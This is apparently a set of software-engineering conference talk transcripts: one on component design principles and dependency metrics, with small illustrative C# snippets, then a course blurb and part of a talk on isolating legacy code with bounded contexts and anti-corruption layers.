They are still dynamically linked libraries. Our mode of operation nowadays is to dynamically link our libraries. That's how we got here. How many DLLs do you have? Guys with the solutions, video studio solutions. How many projects? 60. That's not bad. Who's got more than 60? Oh, look at that. Who's got more than 200? And do you know why you separate your code into different DLLs? Let me ask that question differently. When you deploy your application, do you gather up all the DLLs and just ship the WAD? If you do, then why are you dynamically linking them? Statically link them. Why would you bother with dynamic linking if you're just going to take all those DLLs, gather them up into one gigantic WAD, and throw the big WAD in a directory, and say, well, there's my system. Why dynamically link if you're not going to dynamically deploy? Why did we come up with dynamically linked libraries? We came up with dynamically linked libraries so that we could dynamically deploy our applications. Why? Well, we're going to get to network speed. Hang on a minute, because network speed has a huge impact on this whole thing. Mid-90s, I've got a client. He's got a 250 megabyte executable. In the mid-90s, that was a big program. Now it's nothing. But then, 250 megabytes was a big deal. You could not fit it on a CD. This was a CAD system. He shipped it to companies like Ford. Ford would use it to design gears and levers, stuff like that. He statically linked it. He would deploy the executable to his clients by burning it on several CDs. If he changed one line of code, he had to recompile, re-link, re-burn all the CDs, and deploy all those CDs to all his clients. You can imagine that cost him a fair bit of money. I went there in the mid-90s, and I encountered them at a time when they were trying to chop up their executable into this new idea, DLLs, because they realized that if they had dynamically linked libraries, then they could change a line of code, and ideally, you'd only have to ship that DLL. You could email it. Back in those days, that was a big deal. You couldn't email 250 megabytes in those days. Nowadays, you can, as long as the guy you're talking to has got a reasonable email server. But back in those days, emailing in 250 megabytes was impossible. So they could email the 100 kilobytes of a DLL. And so that was very, very desirable for them. They worked on it for months and months and months, chopping their application up into little tiny bits, turning them all into a bunch of DLLs, and that's when they realized their critical mistake. The critical mistake was that chopping your system up into a bunch of arbitrary DLLs doesn't do you a damn bit of good if they all depend on each other. If they all depend on each other, then you can... Was anybody just in Scott Meyer's talk? Here? The last talk he just gave an hour ago? He was talking about the problem of keyholes. The problem of keyholes is that we arbitrarily constrain someone, for no good reason. Just arbitrarily constrain them. So, for example, have you ever seen a text box on a GUI that was just too short, and you had to type a bunch of stuff in it, and it wouldn't let you resize the window, it wouldn't let you scroll in any way, you just had to kind of type blind, or maybe the text would scroll, but you wouldn't be able to see the beginning of it? He was mentioning the keyhole problem, and I note that something just happened here. Apparently, I'm not allowed to not touch my computer for more than five minutes. 
I must apparently touch my computer, otherwise I will be punished. What was I talking about? Oh, yeah, DLLs. So, this guy, he put all these DLLs together, he forgot that DLLs depend upon each other. His goal was to be able to touch a line of code and just ship that DLL that was affected, but he found that all the pound includes, C++ guy knows what I'm talking about, all the pound includes, formed a horrible network, and he had to recompile and redeploy everything anyway. They went out of business. The purpose of my talk today, now that I'm getting around to it, is to talk about components, the problem of component design. And the first thing we're going to do is define a component. What's a component? Component's a DLL. When I talk about the word component, what I mean is DLL, very particular kind of DLL, a dynamically deployable DLL, DLL, oh, I almost said DNA, a dynamically deployable DLL. Why would we want to dynamically deploy? Well, because we'd like to be able to change one line of code, just ship the one DLL that changed and ignore all the others. What's DLL hell? A term invented, I believe, by Microsoft to describe their own situation, and was to be completely cured by.NET. Anybody remember that line?.NET cures DLL hell. Ha ha ha ha ha. No, it doesn't cure DLL hell. DLL hell is the problem that we've got all these little components with different version numbers, and nobody knows which one should go together, so we invent these module maintenance tools like Maven. What are you guys using.NET? What's the tool that lets you keep all of your DLLs in line so that you know the download version one of that one and version three of that one? Do you have a tool for that? What? Nougat. Like the soft, chewy center? Never mind, I'm not going there. The graph you see on the screen is a graph of x squared. This is just the x squared graph, but it's also something else. It's the number of dependencies in a system, the theoretical maximum number of dependencies given a certain number of modules. And you can see that the number of modules increases linearly and the number of dependencies increases with the square. The couplings of the theoretical maximum number of couplings, which I show here, is proportional to the square of the number of modules. Now, of course, we would never create a system that has every possible dependency in it. Or would we? Look at this curve. This curve is the productivity of a team in comparison to the number of modules. By the way, this is completely arbitrary. I just generated a one over x squared curve here. This is not me collecting actual data. This is just me recollecting my experience with development teams. They go slower and slower and slower over time. Who's had this happen to them? You start out going really fast. You can conquer the world. A year later, you're slogging through some kind of horrible wetlands. And you don't know what the heck has gone wrong, but estimates that used to be on the order of one week are now three months long. And by the way, you blow all those estimates anyway and introduce more bugs than you fix. That's the kind of problem that we have as we proceed along a development path. And one of the reasons for that is this accumulation of dependencies. Why? Well, that's the theoretical maximum dependency between modules. This is the theoretical minimum. If you're going to have an interconnected set of modules, there has to be some dependencies. And the minimum set of dependencies is a tree structure. 
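A quick back-of-the-envelope on those two extremes, assuming the maximum means every module may depend on every other:

\[
\text{maximum} = \frac{N(N-1)}{2} \ \text{pairs} \quad (\,N(N-1)\ \text{if you count each direction}\,), \qquad \text{tree minimum} = N - 1 .
\]

For N = 7 that is 21 coupled pairs (42 directed edges) against 6 edges in the tree; the first grows with the square of N, the second grows linearly.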
Oh, you can do some better with dynamic linking if you want to. But for the most part, you're going to have a small number of dependencies. How many do we have? One, two, three, four, five, six. Six out of seven modules. Whereas here you've got, well, I think that's half of 49. It can't be half of 49 because that would be half of dependency. Maybe it's just plain 49. I don't know what it is. It's a large number. It's some relative of n squared. Maybe it's 1 half n squared plus 1 half n. Something like that. It's a very large number of dependencies. We don't want this. We do want that. We strive very hard to get here. But then some schmuck does that. Visual Studio doesn't allow this. Inside a solution. Inside a solution, the DLLs cannot have cycles between their graphs. That's good. Don't want cycles. Between separate solutions, there's no guarantee. If you have multiple solutions, or if you're linking with things that come out of different solutions, you can still have cycles in the graph. If you get cycles in the graph, it looks like it adds only one extra dependency. But actually it adds more. Because six now depends upon two. Because one depends on two. Dependencies are transitive. Six also depends upon four and five. Six depends upon three and seven. In fact, six depends on all of them. So the number of dependencies multiplies dramatically as soon as you have a cycle. This is the n squared graph again. This is also a graph of C++ compile time. As you add modules. The compile time and the link time, but even if you're not doing static linking, just the compile time grows with the square of the number of modules if you have a fully connected network of modules. What that means is that your pound includes, or your import statements, or your using statements can be traced in a cycle. And if you have that, then you're going to wind up with this big increase in compile time. C++ in particular would do this. Java and.NET don't. Their compile time is based on a different metric. They don't go reading source files the way Java, or the way C++ does. Java and.NET read binary files to get their declarations. C++ reads source files to get its declarations. And so if you had a cycle in C++, you got punished by a big compile time. And a massive one would go up with the square. So you'd add a couple of modules, your compile time would double. And that made us do something about it. Who knows who Ward Cunningham is? Well, few of you do. Good. And the rest of you. He's the guy who invented wikis. Ward Cunningham invented wikis. He's the guy who helped Kent Beck invent pair programming, test driven development, most of the agile stuff. Get to know who Ward Cunningham is. He's a very interesting fellow, a small talk programmer from long ago. And I asked Ward once, why did small talk die Ward? And he said, small talk died because it was so easy to make a mess. You C++ programmers, I was a C++ programmer at the time, you C++ programmers are lucky. Your language punishes you if you make a mess. Small talk didn't punish you. Well, neither does Java, neither does C sharp. They don't punish you anymore. It's very easy to make a very large mess and get a very tangled structure and not know you're doing it. Fortunately, Visual Studio keeps some of the cycles out of your graph. We would like that level of productivity, which is an n log n, rather than this level of productivity, that's an n squared. And one of the ways to help with that is to manage the dependencies between our components. 
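One way to keep that management honest is to check the component graph mechanically. Here is a minimal sketch, with invented names, of a topological-sort style check: it either produces a correct build order or reports that a cycle makes no such order possible. It assumes every component appears as a key, with an empty list if it depends on nothing.

using System;
using System.Collections.Generic;
using System.Linq;

public static class ComponentGraph
{
    // dependencies[c] = the components that c depends on.
    // Returns a valid build order (dependencies first), or throws if the graph has a cycle.
    public static List<string> BuildOrder(Dictionary<string, List<string>> dependencies)
    {
        var remaining = dependencies.ToDictionary(kv => kv.Key, kv => new HashSet<string>(kv.Value));
        var order = new List<string>();

        while (remaining.Count > 0)
        {
            // A component with no unbuilt dependencies can be built next.
            var buildable = remaining.Where(kv => kv.Value.Count == 0).Select(kv => kv.Key).ToList();
            if (buildable.Count == 0)
                throw new InvalidOperationException("Cycle in the component graph: no correct build order exists.");

            foreach (var c in buildable)
            {
                order.Add(c);
                remaining.Remove(c);
                foreach (var deps in remaining.Values) deps.Remove(c);   // c is built; nobody waits on it now
            }
        }
        return order;
    }
}

Feed it the seven modules arranged as a tree and it hands back a bottom-up order; add the one edge that closes a cycle and it throws, which is exactly the "no correct build order" situation.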
Now, something happened to us in the late 90s and into the 2000s. Network speeds started increasing dramatically. Nowadays, it's not hard at all to download a gigabyte in a couple of seconds, to upload a gigabyte in 10 seconds. That's pretty easy nowadays. Back in the early days, it was much harder. So back in the early days, we thought shipping individual DLLs was going to be a benefit. Nowadays, though, we just kind of gather them all together and ship the one big WOD. Why? Well, because network speed is fast enough, we can do it. We can treat our batch of DLLs just like it was statically linked. But there's another issue. How many of you work in teams? Well, look at that. Everybody works in teams. So you come in at 8 in the morning. You got a task to perform. You work all day to get all your stuff working. It all works by the end of the day. You check it in, you go home. Come back the next day, all your stuff is broken. Why? Somebody stayed later than you and changed something that you depend upon. And so you work all day long to fix whatever the problem was, and you go home and you come back the next day and your stuff is broken again. How many times can you go around that loop? Lots of times. This is a problem of large teams. Large teams will start to step on each other. And, of course, we've invented tools to help us. We've got source code control systems, and we've got all kinds of good stuff to help us with this. But we still can step all over each other unless we manage our projects well. So how can we manage our projects well? There is a principle. A principle called the acyclic dependencies principle. The acyclic dependencies principle says, if you have a set of components, you would like them to be arranged without any cycles in the dependency graph. Now, for a whole bunch of reasons, we've already talked about one of them, which is compile time. We've talked about another, which is just the dependency load. Here's another. Alarm would like to release its version of alarm. The team that's working on alarm would like to make release 1.0. They've got nobody that depends on them, or nobody that they depend upon, so they're completely free to make any release they want. So they release their version of 1.0, alarm 1.0. They start working on alarm 1.1. But now alarm 1.0 has been released, which means that elevator and conveyor can make their release. And once elevator and conveyor have made their releases, they can start to work on 1.1, but now transport can make its release. You can see what's happening here, right? The version numbers bubble up from the bottom. 1.0 gets created here, then there, then there, here, here, and finally there. The version numbers bubble up from the bottom. If you look at it closely, you'll realize that the version numbers follow the exact same path as the build, the compile. Because the dependencies are running in that direction. And now some poor smuck does this. Who's this? Well, that was me. I did that. I had an alarm subsystem I was working on, and I needed to put a message on the display in the control panel. There happened to be a class up here that had a function called display, and I thought, oh, I should just call it. So I called it. This was not in a language that restricted me from cycles. And so it compiled and everything was fine. It all worked okay. And then the next day I had a group of angry developers come to my cubicle with clubs and tell me, what the hell did you do? 
I said, well, I just called, I called this control panel display class. It had a display function in it. I needed to put this message on the screen, but I can't do that. Why can't we do that? First of all, what order should we build those modules in? You'd like to build them bottom up. But now there's no bottom. So there's no correct build order. If you have cycles in the component graph, there is no correct build order for the modules in that system. And therefore the execution of that system is undefined. What does undefined mean? What's the definition of undefined? Works in the lab. Anything undefined will work until you actually deploy it somewhere, then it will fail. You can get systems to fail rather badly by having these cycles. This is pretty common in Java. If you have a system of Java that has cycles in it, you can build it, although there's no correct build order. Then you run your test and the test will fail. Then you build it again. That will choose a different build order, and maybe the test will pass. I know of companies that put their build in a loop until the test pass. But the problem is worse than that. Because Conveyor would like to make their release. They want to release 1.1. Now for them to release 1.1, they have to test with Alarm 1.1. But Alarm 1.1 is waiting for Control Panel 1.1, which is waiting for Transport 1.1, which is waiting for Conveyor 1.1, which is the one we're trying to release. So there's no way to make the release without checking all of that source code out into one place, integrating. Anybody remember integration, the joys of integration? Integrate the whole system, and then make it work. And while you're doing that, you're going to be stepping all over each other. So if this cycle will bring back the problem of coming in at 8 in the morning and find that everything doesn't work. But it's worse than that. Because in order to test Conveyor, I need Alarm, which needs Control Panel, which needs Revenue, which needs the database. The database takes 45 minutes to load, and then it crashes. I can't run my tests. And the guys in Conveyor are saying, why the heck do I need the database? Well, you need the database because of this strange dependency structure. Anybody ever look at the number of DLLs that get loaded and scratch your head and say, how come I need those? Anybody in a C++ world ever have a link line and wonder what's all this stuff on the link line? How come I need all that stuff? You got cycles in the dependency graph. It's bringing in all kinds of gunk. So the first principle of components is, no cycles in the components. What if you want to do this? What if you really want to call some function from down here, that lives up there? How are you going to do it? Well, you could pull out another component. That's one way to do it. Here I took that class out of the Control Panel. I put it in the Display component. Then the Alarm component could talk to the Display component. The Control Panel can talk to the Display component. I can keep the cycles out. That's a common enough technique. Remember, these are all DLLs. So the number of DLLs in your system will start to grow as people want to add cycles to the dependency graph. Maybe. Although there is another way to resolve the cycle. You can use dependency inversion. I could put an interface, a display interface in the Alarm sub-system and have the Control Panel implemented. That turns the dependency around and changes the cycle into a straight tree. What's OO? What is object orientation? 
Why do we like it? How come all of our languages are object-oriented languages? We've been doing this for 30 years. We ought to know. Models to real world. Thank you. I planted him here so he could say that. Then I could rip him to shreds. No, that's absurd. The whole idea that OO is a better way to model the real world is plain nonsense. It's something that some guy concocted a long time ago to convince his manager to spend 12 grand on a C++ compiler because he couldn't figure out any other way to get his manager to do it. 12 grand? Early C++ compilers cost a lot of money. 12 grand? I'm not spending that for a compiler. Well, it'll help me model the real world. Oh, okay then. This whole notion of modeling the real world is just downright silly. What in the world is OO other than a bunch of functions using a bunch of data structures? Encapsulated, okay, fine, encapsulated. But a bunch of functions using a bunch of data structures. They're different from non-OO. The answer to that is, well, it's not easy to describe how that's different. Oh, okay, we kind of put the data structures and the functions together, but we always used to do that. Old C programmers used to do that all the time. Data structures and programs always went together. There's a famous book called Algorithms Plus Data Structures Equals Programs. Data structures and algorithms working together. So nothing really fancy about OO there. There is one thing that OO gave us that we did not have before because it wasn't safe, and that's polymorphism. Very, very convenient polymorphism. We used to have it in C, device independence in any operating system is an example of polymorphism. If you can write a program and you don't need to know what device that program is going to use, it's clearly a polymorphic interface. But that's dangerous in most languages, or it was back in the day because you had to fiddle with pointers to functions, and that was always dangerous. What OO gave us was very, very convenient polymorphism. Polymorphism without thinking about it, Java in particular, all the methods are polymorphic. There's no choice. C sharp, you have a choice. You can use that funny virtual keyword. C++ programmers, you've got a choice. You better use that damn virtual keyword, especially on your destructors. But most of us, we don't even pay attention anymore. All our functions are polymorphic. We don't even think about it. Why? Because when a function is polymorphic, something amazing happens. The flow of control goes down towards the derivative, but the source code dependency goes back towards the base. We can take a source code dependency and turn it around without changing the runtime dependency. How do you get DLLs? How do you get components? You isolate them, but you have to maintain the runtime dependency. Visual Studio people, are you using Resharper? Who is Resharper? Look at that, everybody. Does Visual Studio know about Resharper? No. Does Visual Studio call Resharper? Yes. The flow of control goes from Visual Studio into Resharper. There are function calls in Visual Studio that make their way into Resharper, but there is no source code dependency that moves from Visual Studio into Resharper, because they've inverted the dependencies. You can create DLLs that your application will call, but your application doesn't know they exist, and you do that by inverting dependencies. Turn them around. This is one nice way to do that. Now, the alarm system, the control panel, is a plug-in to the alarm system. 
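As a rough sketch of that inversion in C# (hypothetical names, not code shown in the talk): the Alarm component owns the display interface it needs, and the Control Panel plugs in by implementing it, so the source code dependency points back at Alarm while the flow of control still goes out to the panel.

```csharp
// Alarm component: owns the abstraction it needs.
namespace Alarm
{
    public interface IDisplay
    {
        void Show(string message);
    }

    public class AlarmSubsystem
    {
        private readonly IDisplay display;

        public AlarmSubsystem(IDisplay display) => this.display = display;

        public void Raise(string message)
        {
            // Control flows out to whatever implements IDisplay,
            // but the source code dependency points back into Alarm.
            display.Show(message);
        }
    }
}

// ControlPanel component: depends on Alarm, never the other way around.
namespace ControlPanel
{
    public class PanelDisplay : Alarm.IDisplay
    {
        public void Show(string message) =>
            System.Console.WriteLine("PANEL: " + message);
    }
}
```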
The alarm system doesn't know the control panel exists. The control panel is a plug-in, and the alarm system would accept any kind of plug-in. There are a lot of different things that could implement this display function here, so we could have lots of different things that we alarmed. What would you rather depend upon? A component that was stable or a component that was unstable? Trick question. Everybody knows you want to depend on something that's stable. But now let me define stability. Is my laser stable? It's not changing, but is it stable? Stability is not a boolean. Stability is a continuous variable, and it is defined as the amount of work required to make a change. If it takes a lot of work to make a change, it's stable. If it takes very little work to make a change, it's unstable. That is unstable, because it doesn't take much work to make a change to its state. This, well, I won't say that that's stable, because it wouldn't take much work to upset it. And this whole stage doesn't feel very stable to me, so I may have to be careful about the way I move. Let me ask the question again. What would you rather depend upon? Something easy to change or something hard to change? Modify the source code. What would you rather depend upon? A module whose source code was hard to change or a module whose source code was easy to change? Same answer. You want to depend upon the thing that's hard to change. And the reason behind that is very simple. Do you mind depending on string? No. Why don't you mind depending on string? Because if those guys ever changed string, there'd be hell to pay. They would suffer more than you. That's the equation that we're talking about here. You are happy to depend upon something if it will hurt the authors of that thing more to change it than it hurts you. That's the equation. You are happy to depend upon things as long as they're not likely to change, or at least the bastards are going to pay if they change. So, all right. We don't want to depend on things that are easy to change. Think about that very carefully. I don't want to depend on something easy to change. Do we design parts of our system so that they will be easy to change? Yes. What parts of our system do we most want to be easy to change? The GUI. GUIs are volatile. They change for no good reason at all. People will change GUIs just because they feel like it. There'll be some committee that'll be formed to say, you know, our system looks old. What the hell does that mean? Our system looks old. We need to give it a facelift. The marketing people have decided we've got to have a whole new look and feel. Not going to change any behavior. Just a new look and feel for the GUI. The GUI has to be easy to change. The modules that hold that source code have to be easy to change. And that means that none of your other modules should depend on the GUI. No source code dependencies should land on the GUI. Your components should not have dependencies that land on the GUI. GUI components have to depend upon the application. Application components cannot depend on the GUI. Otherwise, you wind up with systems where the GUI is hard to change. How many of you test your systems? Automated tests. Through the GUI. Ooh. Got a couple of people. If you write test code through the GUI, you are depending on something that's supposed to be easy to change. You will make it hard to change if you test your system through the GUI. I have a client who has 15,000 tests that all go through the GUI. Same client, by the way.
Same one that went out of business. 15,000 tests through the GUI. He has so many tests he didn't know what they were anymore. He just knew they all had to pass. If somebody touched the GUI, a thousand of those tests would break, and he couldn't find the time to fix them. So he came up with a real simple rule. What do you think that rule was? Nobody touches the GUI. They made the GUI hard to change. The other thing, of course, that could happen there is that you could lose your tests. You spend a man year putting together a nice automated test suite that goes through the GUI, and then somebody decides, oh, we need a facelift on our site. Throw out the old GUI, put a brand new GUI, and all those tests are gone. And you get to rewrite them again, but you've got other systems you've got to test. Don't test through the GUI. Don't do anything through the GUI. All dependencies point away from the GUI. What other things do we want to be easy to change? The database. We want the database to be easy to change. We want to be able to make changes to the database without it rippling through the whole application. All dependencies should point away from the database. Put the database in a component with all dependencies pointing outwards. Put the GUI into a component with all dependencies pointing outwards. I don't want to depend on anything that is unstable. How can we measure instability? See this guy up here? That component up there? Is he stable or unstable? He's got lots of incoming dependencies. No outgoing dependencies. He's hard to change. If I make a change to him, it impacts all those guys. This component here is responsible to those guys. This component here is independent. It doesn't depend on anybody. It's responsible and independent. It's an adult. Stable. Adult. This guy. He depends on lots of other components. Nobody depends upon him. He's irresponsible and dependent. He's a teenager. He's unstable. These are the two extreme kinds of components. At the two sides of the component spectrum, you've got the adults that are highly stable and you've got the teenagers who are highly unstable. The unstable ones are easy to change. That's where we want to put all the volatile code. The stable ones are hard to change. We can measure that stability by creating a metric. That metric is a metric that I call I. I is equal to the fan out, the number of outgoing dependencies, divided by the fan in plus the fan out. If you think about that for very long, you'll realize that I is a metric that goes from zero to one. Zero being stable, one being unstable. Zero being an adult, one being a teenager. It's all about the dependencies. And now we can rephrase the principle to say this. Every dependency in a component graph should point at something more stable than it is. Or if you use the metric, these arrows should point in the direction of decreasing I, decreasing instability, increasing stability. And you can do the math on just the fan in's and fan out's and verify that that's correct. Why was the cycle a bad idea? Something stable depended on something unstable. But that leaves us with a problem. And the problem is this. What's that guy? Stable or unstable? He's really stable. He's sitting down here at the bottom of the graph. Everything over here depends on him. He's very hard to change. If I touch that component, all these other components will be affected by it. If for no other reason, then the release number changes. 
That means that stuff down here at the bottom of the graph is very difficult to work with. But there's an escape to that. Back to polymorphism. How can you make something easy to extend even though it's hard to modify? You make it abstract. Abstract classes can be extended trivially without having to modify them. You can add new features to a system if those new features live inside of derivatives of base classes. The final principle is this. We would like abstractness to increase as we go down these arrows. Stuff up here, concrete. Unstable and concrete. Stuff down here, abstract and stable. Abstractness becomes more and more prevalent as we go down this tree. In fact, we could say that abstractness is a number, which is the number of abstract classes divided by the total number of classes in a component. If you did that, you get this number A, which goes from zero to one. Zero being concrete, one being entirely abstract, composed of nothing but interfaces. Then we can do this very interesting thing. We can say that for any particular component, A plus I should equal one. Either it's abstract, where A is a one, and stable, where I is a zero, or it is instable, where I is a one, and concrete, where A is a zero. A plus I equals one. The magic formula of components. A plus I equals one. Now, you've got the adults up here, which are abstract and everybody depends upon them, so they're stable. You've got the teenagers down here. So you've got everybody that's got no incoming dependencies, but they're very concrete. What do you got here? This is the line A plus I equals one. This is where we'd like all our components to sit if they can't sit at one of those two endpoints. Why? Well, what's up here? Highly abstract, nobody depends upon it. An interface that nobody implements. Useless, this is the zone of uselessness. We do not want our components going that way. What's down here? Very concrete, everybody depends upon it. Database schemas. Concrete, everybody depends upon them. Fun to change. We don't want things down here. This is the zone of pain. We'd like our components to be as far from those two points as possible. Ideally, if we could get them here and here, that would be best. But it turns out that components are persnickety that way. So at least we would like them to be sitting along this line. Or close to the line. Which leaves us with one last metric. D. How far away is the component from the line? Well, D could be the absolute value of A plus I minus 1. You can do the math on this. It's not very difficult. D is a metric that goes from 0 to 1. 0 means right on the line, 1 means at one of the two bad endpoints. If you want to know which endpoint, you can take the absolute value signs off. But I don't care. You can measure D by looking at the fan in and the fan out of a component, measuring its abstractness. Doing the math, it's not a very difficult math to do. And find out whether your component sits nicely on that line. If it does, then it is abstract as it is depended upon. If it doesn't, that means either it's very abstract and not depended on, or very concrete and heavily depended upon, both of which are bad ideas. There are lots of tools that will automatically calculate these metrics for you. If you've ever used N-depend, that will calculate the metrics for you. If you've ever used any of the other static analysis tools, they can generate all these metrics, I, D, all of them for you, so that you can look at your components and see if they fit. 
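A minimal sketch of those numbers in C#, using the formulas just described, I = fanOut / (fanIn + fanOut), A = abstract classes / total classes, D = |A + I - 1|; the type and the sample figures here are made up for illustration and are not any particular tool's API.

```csharp
using System;

// Example: a heavily depended-upon component had better be abstract too.
var stats = new ComponentStats(FanIn: 8, FanOut: 2, AbstractClasses: 7, TotalClasses: 10);
Console.WriteLine($"I={stats.I:F2}  A={stats.A:F2}  D={stats.D:F2}");

public record ComponentStats(int FanIn, int FanOut, int AbstractClasses, int TotalClasses)
{
    // Instability: 0 = stable "adult", 1 = unstable "teenager".
    public double I => (double)FanOut / (FanIn + FanOut);

    // Abstractness: 0 = entirely concrete, 1 = nothing but abstract classes and interfaces.
    public double A => (double)AbstractClasses / TotalClasses;

    // Distance from the main sequence A + I = 1: 0 = on the line, 1 = one of the two bad corners.
    public double D => Math.Abs(A + I - 1);
}
```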
And then think about what should be easy to change. Things that are easy to change should be in teenagers. Things that are hard to change should be in adults that are abstract. Concrete teenagers hold the stuff that's easy to change. Abstract adults hold the stuff that's hard to change. Any questions? We started with PDP-8 assembly code. And got here. Any questions? No? Good? Oh, damn. It's alright. It's okay. What happens when you have a... Yeah? And then you just step above that to the... Oh, two versions. Yeah, two versions, same component. You kill the programmers. Yeah. Don't have multiple versions of the same component in your system, please. That's DLL hell. Anybody else? Where do you place the... Very, very good question. The string class sits right there. It's in the worst possible place, but nobody ever changes it, so we don't care. This is all about the stuff we are actively developing, the stuff that is being changed. So we pay very close attention to the stuff that's in our libraries that are changing. The stuff that we get from other libraries that's not changing, or the stuff that's in our old libraries that's not changing, we're not going to pay attention to that here. A lot of that stuff may live here, and that's okay. None of it's going to live here. Well, some of it might. Everybody pulled out any dead code? Abstract classes that nobody implements? Yeah, okay. So maybe you'll see some stuff there. But string, vector, a lot of the libraries live down here, and we don't care because they're not volatile. Think of another axis coming out from this graph, right? Towards you. That's the axis of volatility. This is a slice where volatility is close to one. The stuff where volatility is zero, we don't care about. Anybody else? Yo, in the back.
|
How do you manage the structure of large agile and object oriented systems? What is the best way to break that structure into components? What should the components contain, and how should they be interrelated? How can we effectively partition a system into independently deployable components? This course teaches the 6 principles of object oriented component design. The first three are principles of component cohesion, which discuss the rules for how classes should be allocated to components. The second three are principles of component coupling, which discuss how components should be related to one another. Principles include the Common Closure Principle, the Stable Dependencies Principle, and the Acyclic Dependencies Principle, among others.
|
10.5446/51499 (DOI)
|
All right. So I already asked, looks like most people are .NET. This is kind of going live for cowards, really. It's kind of how to sort of not blow yourself up if you have a huge whack of legacy code, how to not get all these calls to customer support, and not to have to deal with all the really, really ancient code that's full of trolls. So who's, yeah, everybody's got legacy code, but who's doing most of their work in kind of messy legacy code, kind of the ugly side, and coming to a conference like this for sort of relief? Oh, God, this is so beautiful. This is, unfortunately, you've turned up for the ugly part of the conference. This is mostly about messy legacy code and kind of the disgusting things. And let's look at how we can actually do this a little safer. Of course, as all of us who work in legacy code know, it's easier said than done. I've often considered trying to make a living actually speaking, because it's easy compared to the coding, right? In fact, we have time for questions and so on, so let's see if we can relate this a bit to your daily experience and actual problems you have. What we're going to talk about is going to be techniques for not having to touch your legacy code wherever possible. It's a tangled mess. The best way to deal with it is if you didn't have to deal with it. Is there something you can do? Can you carve out pieces? We're also going to look at ways of dealing with things going wrong. Services go down. Database problems, whatever, server problems. Do you just want to sort of sit there and take it at 3 a.m. when the support call comes? Or can we do something, sort of a more gradual, more systematic degradation of the user experience perhaps? And we're going to have a brief sidebar into the idea that the faster you can turn this around, the quicker you can react to something going wrong. But I'm going to keep that one brief. I had originally planned to do that later, but there have already been lots of other speakers at this conference who talked about automation and continuous integration, all the rest of it. So I'm going to look at that briefly and specifically for what it means for legacy code and stuff you can do. But the main thing is going to be about how to structure code and legacy code so you don't have to touch too much of the stuff. Then taming side effects, limiting damage, switching the thing off. And of course, I've forgotten all about having these fly-in things in the slide. Awesome. So legacy code, oh, this is from, I'm actually Bavarian, believe it or not. It's been decades since I've actually lived there. But this is known as a Wolpertinger. A Wolpertinger is a southern Bavarian, sort of mythological creature made up of many different parts, part bird, part fish, part badger. And that's kind of what legacy code is like. It's got many different concerns and does many different things. So it kind of doesn't make any sense, right? So how can it be divvied up into pieces which make sense? Who here has either read up on or is actually doing domain-driven design? Yeah. Domain-driven design, Eric Evans and folks, came up with this wonderful concept of a bounded context. I'm going to get into that a little, but it's actually not a technical concept at all. A bounded context is sort of an area of applicability of language, ordinary sort of business language.
The things have a particular meaning within that bounded context and it's like, we're going to see examples later, how you can use this bounded context and linguistic business focused language to kind of impose order on your legacy code. You can, how you can sort of identify the bucket into which things need to fall and then you have two choices. You either refactor so you get those buckets or you don't and you cheat and that's what we're mainly going to talk about later. So let's take a look at that. I'm going to, the cheating part means, well, we're going to try to not touch more than we absolutely have to of that legacy code and yet build new functionality on. I did mention it was kind of like a snake oil kind of thing, right? I did mention this is, that's okay, I'm used to that. If you were going to legacy code, you're usually overpromise. Open close principle, Bertrand Meyer brought this up initially. Those of you, most of you probably heard that. It's this ideal on how software should evolve. It's kind of open for extension, closed for modification. Once you write a class or something, ideally all changes are additive. And this is a nice idea in principle on the small scale as well as the big scale. Ideally you could extend all your systems by plugging in and adding on new stuff, right? It would be wonderful. Why is that? Why is that such a good idea? It's because in short it cuts down on side effects and regression test effort. If you only add stuff to it, well, there's a slightly lesser chance that you blow something away that already exists. Of course, legacy usually coupled to the large database in the sky, which means you're going to do it anyway, but that's okay. The second advantage is much from a business perspective is probably more tangible. If you actually haven't changed that lack of code, then no one needs to go away and regression test it. And that means that you can turn around faster because who's got sort of in-house QA departments? Most people, right? Could I have just a question? Who works in a company of, say, more than 100 people? Wow. More than 1,000 people? All right. 10,000 people? Okay. Serious legacy code then. Serious legacy code. Yeah. So you get this thing. So you know all about working with QA. And one classic thing that always happens, which is a great focus and so on, but of course there's a lot of manual testing. All this test automation stuff is marvelous. We're going to look at how to get some of this legacy stuff on the test in a moment. But the reality is with the legacy stuff, it just won't be, right? It just won't be. And so what happens, you make your fix and then comes the part where your code sits somewhere and waits until somebody gets around and actually tests it. And so if you can reduce the amount of stuff which actually changes in existing systems, it by a definition means there's less to test. And so you might get a faster turnaround. You might just be able to get this stuff done faster because you need less QA resources and fast is good for being responsive. So I'm going to look at that. Now strategies for dealing with legacy systems. There is a concept, it comes from Eric Evans and domain-driven design called a bubble strategy. You have a sort of your new system or your new features sitting sort of to the side of the existing system. And the way you achieve that is you write anti-corruption layers or what have you, which keep all the messy stuff apart from the existing stuff. 
So this can go all the way to the system having its own completely separate database. If your new piece of functionality and it will come to how to actually identify what makes a good piece of new functionality versus a bad piece of functionality as in how to maintain highly coupled or loosely coupled a little later. But if, say, there was a miracle by which you can actually identify such a bubble which is completely internally consistent, the only way into that bubble is through its exposed API. The only way, the only data it ever uses is from its own local database within that bubble. That would be nice because it's the difference between a big mess where everything flows into each other and everything's coupled together and a little mess, preferably one you and your team made all by yourselves and you know, meaning this little bubble, almost like an app or small piece of software on its own with a well-defined API. Now it so happens that that's also the definition of a class really should really have the only way you can do anything in there is through its exposed interface and API. It goes all the way up to a service which is deployed somewhere on a server, I don't know what, a REST service, what have you. In the end, the REST piece is just the transport. It's just the thing which talks to a well-defined API. If you really stick with all design, every class is that completely isolated world with no way in or out, which means for starters it's a lot easier to test, right? You don't have to get all sorts of strange databases in the right state. There will be no side effects which you can't, which outside the bubble, autonomous. And two types of bubbles are an existing database with an anti-corruption layer or a separate database with a so-called synchronizing anti-corruption layer. And I'm not going to talk about the open host service very much. I can look that up in the DDD literature if you want, especially Eric Evans' famous blue book. And an open host service basically just wraps your entire legacy mess into a big API and you hope for the best. We're going to concern ourselves mainly with this autonomous bubble concept with a separate anti-corruption layer. And we're actually going to do that by using events to populate that separate bubble which will have its own database and so forth. This bubble, as you can see, you have the great clouded, all sorts of things in it, legacy system in the sky and say someone wants to make a new sales support system which helps selling, in this case, hotel reservation, get rooms in a hotel booked and get occupancy in a hotel up and reservations and quotes for prices and so on. And this particular API has a quote function, quote for room booking request. And the other part of the API is you can set a room rate, remove a discount rate, add a discount rate. So this is all done here. There is some sort of admin website. I'm sure the guys who work in the really big shops have these. This seems to be a common pattern. You have an admin website through which all sorts of default values, all the rest of it are set. And it's probably an admin website which administers five or six or more or whatever, totally complete unrelated things. And each time you build something new, something else gets clugged into this admin website. I'm 